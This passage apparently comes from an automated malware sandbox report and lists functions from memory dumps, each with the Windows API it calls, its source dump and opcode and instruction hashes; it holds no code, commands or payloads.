                                                                                              • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                              • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02557910, Relevance: 2.0, APIs: 1, Instructions: 493libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.386114351.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f47ea84101cfb61d982a461be9a84a0aa7bcbbe8cb43e3208f3e3e0bba1d4f40
                                                                                              • Instruction ID: 37331ef146b2c4ec478c94ab79acb525a1408612820d8b5de1a1867e36f90019
                                                                                              • Opcode Fuzzy Hash: f47ea84101cfb61d982a461be9a84a0aa7bcbbe8cb43e3208f3e3e0bba1d4f40
                                                                                              • Instruction Fuzzy Hash: D132B274941229CFDB65DF24C894BEDB7B2BF4A304F5085EAD809AB250DB319E85CF84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 025581C4, Relevance: 1.9, APIs: 1, Instructions: 438libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.386114351.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: a62d411b45b5507af52edcf93e09cf1ddb622e564883a43031e5bf69e06bb1ca
                                                                                              • Instruction ID: 312140937968ef5a95ce4bc09240099fc9c73b966bad9e6251c445dfa551f91a
                                                                                              • Opcode Fuzzy Hash: a62d411b45b5507af52edcf93e09cf1ddb622e564883a43031e5bf69e06bb1ca
                                                                                              • Instruction Fuzzy Hash: 3A228F74941229CFCB65DF24C994BEDB7B2BF4A304F5085EAD809AB250DB319E85CF84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3424, Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(?,00000E80), ref: 04BD3523
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getaddrinfo
                                                                                              • String ID:
                                                                                              • API String ID: 300660673-0
                                                                                              • Opcode ID: eecfcf89ce0ff64a13c63fba4097ff5d3f437cfa7159b1a3ba79c719217152e1
                                                                                              • Instruction ID: 28926df8f3ca9860c35035efe38ea81c66e981a5ebd6dc85a0abf9c20d5f83eb
                                                                                              • Opcode Fuzzy Hash: eecfcf89ce0ff64a13c63fba4097ff5d3f437cfa7159b1a3ba79c719217152e1
                                                                                              • Instruction Fuzzy Hash: A341B4B14093806FEB238B659C55FA2BFB8EF07310F0944DBE9848F093D665A909D771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB859, Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,?,?), ref: 00ACB932
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 08522d52da136479575dfce34004fc1e722a518b68f3df707153c2d0dee44fa2
                                                                                              • Instruction ID: 0cc0fda5a5497177702a06b464527e8dc533f978c0da48f9b4e492c6d7150f38
                                                                                              • Opcode Fuzzy Hash: 08522d52da136479575dfce34004fc1e722a518b68f3df707153c2d0dee44fa2
                                                                                              • Instruction Fuzzy Hash: 36415B2500E3C06FD3039B258C65A61BFB4EF47620F0E85DBE4C48F5A3D229691AD7B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3F08, Relevance: 1.6, APIs: 1, Instructions: 113networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04BD3FDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Connect
                                                                                              • String ID:
                                                                                              • API String ID: 3144859779-0
                                                                                              • Opcode ID: ad8358cf682bc158b8a4efb8b9803d53f3958d5eb9dad46bc29048cddb0e8ad3
                                                                                              • Instruction ID: fa47654da872aace343b303565eb4ad698e885076d18e46f45bc01cd5b3e50cb
                                                                                              • Opcode Fuzzy Hash: ad8358cf682bc158b8a4efb8b9803d53f3958d5eb9dad46bc29048cddb0e8ad3
                                                                                              • Instruction Fuzzy Hash: 3541396640E3C45FDB138B659C64A52BFB4AF07214B0E84DBE9C4CF1A3E2699909D722
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB516, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaLookupSids.ADVAPI32(?,00000E80), ref: 00ACB5EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupSids
                                                                                              • String ID:
                                                                                              • API String ID: 2427636062-0
                                                                                              • Opcode ID: 5a42e3650bf0266b4de79ef901681ddeacc8347e623ec4c2496dcab84dddafd9
                                                                                              • Instruction ID: c3017b1427aaa4ac308ae0ea072f2ac645a9b2b01cf8e37f8ca1506c592a8a90
                                                                                              • Opcode Fuzzy Hash: 5a42e3650bf0266b4de79ef901681ddeacc8347e623ec4c2496dcab84dddafd9
                                                                                              • Instruction Fuzzy Hash: C8319372504344AFEB22CB65CC85FA6BFECEF15310F08899AE985DB152D724A948CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD362E, Relevance: 1.6, APIs: 1, Instructions: 110networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAIoctl.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3711
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Ioctl
                                                                                              • String ID:
                                                                                              • API String ID: 3041054344-0
                                                                                              • Opcode ID: ffe3c94e007bd636c30e1c97d9dad3a82bed6dbe19ad601bfbd06ce2c40a0e43
                                                                                              • Instruction ID: 9fc0cb66642c14df6de03e11fa79eca3ef4a53bd198d20d521451c37b2d4a2f8
                                                                                              • Opcode Fuzzy Hash: ffe3c94e007bd636c30e1c97d9dad3a82bed6dbe19ad601bfbd06ce2c40a0e43
                                                                                              • Instruction Fuzzy Hash: 61414C7550D7C06FD7238B658C94E92BFB8AF07210F0984DBE985CF1A3D229A849D772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD57EF, Relevance: 1.6, APIs: 1, Instructions: 110processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessA.KERNEL32(?,00000E80), ref: 04BD58DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 14d9d74b03ca337836c7ff19cdecb3ccbc5bb957e47113436f7a8fdce7090f93
                                                                                              • Instruction ID: 0aaa15e3ff748d9c23dcdacfaf98a0429f4f3c03e1d98149b19cec73cc069ade
                                                                                              • Opcode Fuzzy Hash: 14d9d74b03ca337836c7ff19cdecb3ccbc5bb957e47113436f7a8fdce7090f93
                                                                                              • Instruction Fuzzy Hash: 48319071100305AFEB31CF55CC81FA6BBECEF04710F0489ADFA458A191E265F949DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD39FA, Relevance: 1.6, APIs: 1, Instructions: 109registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3AB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 8d15778fb22a8dc7295e11f83816dd40bbce68feab82ddfa298efc9c5e860518
                                                                                              • Instruction ID: d598df267f7b89e1d6d7ba452685ff844f09c7e70f52130504fe33def9dd59b7
                                                                                              • Opcode Fuzzy Hash: 8d15778fb22a8dc7295e11f83816dd40bbce68feab82ddfa298efc9c5e860518
                                                                                              • Instruction Fuzzy Hash: 163193B15083846FE7128F65DC45FA6BFF8EF06310F0888EAE9859F153E264A909C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD214C, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RasEnumConnectionsW.RASAPI32(?,00000E80,?,?), ref: 04BD222A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionsEnum
                                                                                              • String ID:
                                                                                              • API String ID: 3832085198-0
                                                                                              • Opcode ID: 9c32c0064ea9b466de7fd54de259d5e48c4dbe1055544a07c119d80668f58247
                                                                                              • Instruction ID: a8b567ac3a36131327c56f1347e1b756f18781f2c1ddd38d5ba31470c49ab4ef
                                                                                              • Opcode Fuzzy Hash: 9c32c0064ea9b466de7fd54de259d5e48c4dbe1055544a07c119d80668f58247
                                                                                              • Instruction Fuzzy Hash: C3317E7540E3C05FD7138B358C65AA1BFB4EF47614F0A44DBD8848F1A3E6686909CBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD2EFE, Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 03a96329090b1892cf955b0c05dc7b5a5855fbe253a5dde0f12b982113f48d4e
                                                                                              • Instruction ID: 27dfe8b649256d71c6f370caa0d84461e129e9a0ce76213f79dbdcd4b153c219
                                                                                              • Opcode Fuzzy Hash: 03a96329090b1892cf955b0c05dc7b5a5855fbe253a5dde0f12b982113f48d4e
                                                                                              • Instruction Fuzzy Hash: 84318C7590E3C05FD7178B259C55692BFB4EF43220F0984EBDC85CF2A3E229A849C762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD4A5E, Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD4B28
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              • Opcode ID: afe20aaabdf087a6c4542071a4856374e7cabc86e225f80e88bc9434143e78e5
                                                                                              • Instruction ID: f71977da0d5aa728d9b3da2be582842c3ff81aced0f54177db235b0784642943
                                                                                              • Opcode Fuzzy Hash: afe20aaabdf087a6c4542071a4856374e7cabc86e225f80e88bc9434143e78e5
                                                                                              • Instruction Fuzzy Hash: B4314A7100E3C06FE7238B648C54B52BFB8AF07210F0985DBE9C5DB1A3D269A849C772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD2DFA, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindClose.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2EC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 7b1f4cf15028553b5634a5682612f3d563ef290ef8335bbdd4b46a43c4e8590f
                                                                                              • Instruction ID: 04c55e1c7d5bece30ff52705dd0a524d75be3da3db6c28cc1056bcd13a5453fb
                                                                                              • Opcode Fuzzy Hash: 7b1f4cf15028553b5634a5682612f3d563ef290ef8335bbdd4b46a43c4e8590f
                                                                                              • Instruction Fuzzy Hash: B231F4715093C06FD7128F25DC45B52BFB8EF42620F0984DAED898F663D265A909CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACBD47, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00ACBDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: b51dd3c9a020309a49c8797c6d818a623197220399ffc4703689d75f573ead5e
                                                                                              • Instruction ID: 4e6ea2279f7b70559b058eb9c84088e6f772639280a9735ee5c6dd1937a748da
                                                                                              • Opcode Fuzzy Hash: b51dd3c9a020309a49c8797c6d818a623197220399ffc4703689d75f573ead5e
                                                                                              • Instruction Fuzzy Hash: 8B318FB1504380AFE722CB65DC45FA2BFF8EF05314F08849EE9858B252D371A909CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5812, Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessA.KERNEL32(?,00000E80), ref: 04BD58DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: db0d672d22df4289082dd1ec36c34d0abddc3bea86e1215ad769bf82549bf48b
                                                                                              • Instruction ID: c18b0ec6bc630c2c595fdc4a123d58e7dd3de7655026db5922afbad74c6ee42c
                                                                                              • Opcode Fuzzy Hash: db0d672d22df4289082dd1ec36c34d0abddc3bea86e1215ad769bf82549bf48b
                                                                                              • Instruction Fuzzy Hash: AF319EB1600205AFEB31CF65CC81FA6BBECEF08710F1489ADFA468A191E671F544DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD375B, Relevance: 1.6, APIs: 1, Instructions: 95windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(?,00000E80,?,?), ref: 04BD381E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              • Opcode ID: c4b2666bce085a26331ebdcdc800c0e9354c987fbcc7a0780d580d134ad58635
                                                                                              • Instruction ID: a36337b6dd037e51a36d11c25bcde9965266669f7fbabe74d959b902cc3cd4b2
                                                                                              • Opcode Fuzzy Hash: c4b2666bce085a26331ebdcdc800c0e9354c987fbcc7a0780d580d134ad58635
                                                                                              • Instruction Fuzzy Hash: 0131907150D3C45FD7038B259C61AA2BFB4EF47614F0A84DBD8C48F1A3E624A91AC7B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACABA2, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 00ACAC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 62901a4f901eb3ce45b65d4c5b1f9c1f78df8c366a9bb9750a19edb665a6f81b
                                                                                              • Instruction ID: 61a436320813bcef982da43c06d594957f7976e8b7d6e40d9101dd6dc1510cc1
                                                                                              • Opcode Fuzzy Hash: 62901a4f901eb3ce45b65d4c5b1f9c1f78df8c366a9bb9750a19edb665a6f81b
                                                                                              • Instruction Fuzzy Hash: 7F31B6725083846FE7128B65CC85FA7BFFCEF15310F08849AED859B152D664E909C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3BFA, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3CA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 4a97c2d78b5c35507bf9c00590b3aba109980c6ea9785855be48ebccd9746a82
                                                                                              • Instruction ID: 733f363598e7a3c09ebda5c406449559967fb33c9f1e5d7a507f72c47f70a7ff
                                                                                              • Opcode Fuzzy Hash: 4a97c2d78b5c35507bf9c00590b3aba109980c6ea9785855be48ebccd9746a82
                                                                                              • Instruction Fuzzy Hash: 0231C0B24093846FEB228F25DC44F66BFB8EF06310F0884DAED849F153E224A909C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB556, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaLookupSids.ADVAPI32(?,00000E80), ref: 00ACB5EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupSids
                                                                                              • String ID:
                                                                                              • API String ID: 2427636062-0
                                                                                              • Opcode ID: 77fe54615a2df29b88529d8cf4b51cc9cdcdc8585a6192e5055a47fefb467378
                                                                                              • Instruction ID: 0eaef2009cb0e1363bc6405bd5e3a3bbf2e84f6f47334b31afe8a308bb51b9c0
                                                                                              • Opcode Fuzzy Hash: 77fe54615a2df29b88529d8cf4b51cc9cdcdc8585a6192e5055a47fefb467378
                                                                                              • Instruction Fuzzy Hash: BC21A2B2500208AEEB21DF69DC85FAAFBECEF14310F14886AE945DB141D735E544CB75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD11D9, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              • Opcode ID: ad051b3d3c11dfd7da6a6f30345b96c0ec3e6f5ecf5bf3e728f6a86604c3774a
                                                                                              • Instruction ID: d93aeef5017128dadcbf8595f46cc25b45069ab98a062dfaacbf14d98092ae57
                                                                                              • Opcode Fuzzy Hash: ad051b3d3c11dfd7da6a6f30345b96c0ec3e6f5ecf5bf3e728f6a86604c3774a
                                                                                              • Instruction Fuzzy Hash: BE31A1755097806FEB12CF25DC44B52BFF8EF06310F0884DAE9849F253E365A508CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD2535, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              • Opcode ID: d5dc22a2e9f1edaf5bbb879ce0b65552b6c4cbb835db4fde84a0a8f06eb5a9f3
                                                                                              • Instruction ID: 5555ebe3fc45682257af28e84568887b67b836a1422c76b37a374c54bb7a86c5
                                                                                              • Opcode Fuzzy Hash: d5dc22a2e9f1edaf5bbb879ce0b65552b6c4cbb835db4fde84a0a8f06eb5a9f3
                                                                                              • Instruction Fuzzy Hash: 84311A6650E3C05FD7138B259C60A51BFB4AF07214F0E80DBE885CF1A3E669A948D772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACAC99, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACAD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: af7f4af1f2f6a69aa11a73e7cdbd3176f83e0feca98279186a6caa3850a5cb75
                                                                                              • Instruction ID: 25dd960fa5c24d3937634a1173aa7588521d1359445f8c630d2349d2b748733c
                                                                                              • Opcode Fuzzy Hash: af7f4af1f2f6a69aa11a73e7cdbd3176f83e0feca98279186a6caa3850a5cb75
                                                                                              • Instruction Fuzzy Hash: 7431A4715093846FEB22CF65DC84FA2BFF8EF06314F09849AE985CB152D264E949CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0CE8, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessTimes.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              • Opcode ID: b405a729e173a9d2a4e152dab39d9c661afaf381c239ddcf99d3bb833a4e31ea
                                                                                              • Instruction ID: 8a0d27644c6694cda6ea4082079ff77424bdb8537981cde7231a2511d9299d29
                                                                                              • Opcode Fuzzy Hash: b405a729e173a9d2a4e152dab39d9c661afaf381c239ddcf99d3bb833a4e31ea
                                                                                              • Instruction Fuzzy Hash: 2631D5765093806FEB128F64DC45FA6BFB8EF06310F0884EBE9859B153D225A509D771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD069C, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: b02a1886e04a019259b3c87e6d27ec24effceac393a50b5260d5d1440b7e9c33
                                                                                              • Instruction ID: d79e93a783e5ef1b00b9dcc7f99402b28c48d156a45f4cc3b7b0fe552a2fb29b
                                                                                              • Opcode Fuzzy Hash: b02a1886e04a019259b3c87e6d27ec24effceac393a50b5260d5d1440b7e9c33
                                                                                              • Instruction Fuzzy Hash: 3031C4B2404784AFE722CF55DC85F56FFF8EF05320F04859AE9849B152D365A509CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB104, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACB19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              • Opcode ID: fd72dbc691d792cd92cef455e14af25edd1c7a674a1688eb864ce5ccc45e1952
                                                                                              • Instruction ID: cdda34dc168daf20056d5e1c1cb9dd47ae47a41ecdfeba28ccdd0a7ce8a93e75
                                                                                              • Opcode Fuzzy Hash: fd72dbc691d792cd92cef455e14af25edd1c7a674a1688eb864ce5ccc45e1952
                                                                                              • Instruction Fuzzy Hash: 9D21D2715083806FEB228F65DC95FA7BFB8EF06310F0884AAE985DB152D321A948D771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB423, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00ACB4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              • Opcode ID: aa465fb2353962d91b6e8fc7f2cd4d0aa7fcbc14cd3e23af3ff567ffd21fbf65
                                                                                              • Instruction ID: 20d01d60cf1430614c0f8b2c71ab76e79634b03303f1f9e4a3f8b9b3e993b535
                                                                                              • Opcode Fuzzy Hash: aa465fb2353962d91b6e8fc7f2cd4d0aa7fcbc14cd3e23af3ff567ffd21fbf65
                                                                                              • Instruction Fuzzy Hash: 6B21A072504344AFEB21CF65DC85FA6BFF8EF05310F18889AED859B152D325A948CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD68E3, Relevance: 1.6, APIs: 1, Instructions: 85encryptionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD697A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              • Opcode ID: 69b553cf13f290742baaf92608700b8854aaaf78c820a8857821c1298e2a4cc7
                                                                                              • Instruction ID: 5a47d520556629958567c9355712f0ef813752a348a50b0921c7ecc6833b7399
                                                                                              • Opcode Fuzzy Hash: 69b553cf13f290742baaf92608700b8854aaaf78c820a8857821c1298e2a4cc7
                                                                                              • Instruction Fuzzy Hash: 6E2191B55093846FE7128F64DC85B56BFB8EF06320F0884EBE985DF192D265A809C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0A29, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMutexW.KERNEL32(?,?), ref: 04BD0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
